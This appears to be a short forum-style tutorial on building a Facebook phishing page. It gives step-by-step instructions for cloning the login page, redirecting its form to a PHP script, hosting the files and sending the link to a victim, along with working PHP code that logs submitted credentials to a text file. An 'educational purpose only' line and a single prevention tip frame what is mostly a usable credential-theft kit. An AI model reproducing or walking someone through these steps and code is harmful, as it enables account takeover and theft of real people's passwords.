So, what is "phishing?"
- Phishing is the process of direction users to enter detail to a fake or clone that really looks like real one.
Also, REMEMBER, this post is just only for educational purpose only.
1. Now got to facebook login page. Right click on the page and select "view page source."
Copy the codes to the notepad. Search "action" by pressing Ctrl+F and you will find
"" and change to "phishing.php."
2. And then search for "method" and change "post" to "get".
3. And save as "index.html"
4. You need to create phishing page. Well copy the codes below.
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
5. Save the file as "phishing.php."
6. Again, save a new blank text file as "passwords.txt"
7. Half-finished. You may need a domian for your phishing page. Now go to the address
8. Register a new account.
9. Check your email and comfirm the account. Sometimes, the email gone to the spam box!
10.After comfimed. Copy your control panel name.
11. Go to and log in to your comfirmed account.
12. Go to the online file manager under the files tab.
13. Go to htdocs or public folder.
14. Delete all files in the folder and upload the three files (index.html, phishing.php and passwords.txt) one after another.
15. After successful uploading of three files. Click on index.html. A fake page will open.
16. You are now ready to phish. Copy the link and send to your victim. If victim enters his gmail and passwords, it will lead to Facebook page. Check your passwords.txt now.
17. Phish hacking is now complete. You've got the victim email and passwords.
18. To prevent from phishing attack, carefully check the link address before login.
**Good Luck**
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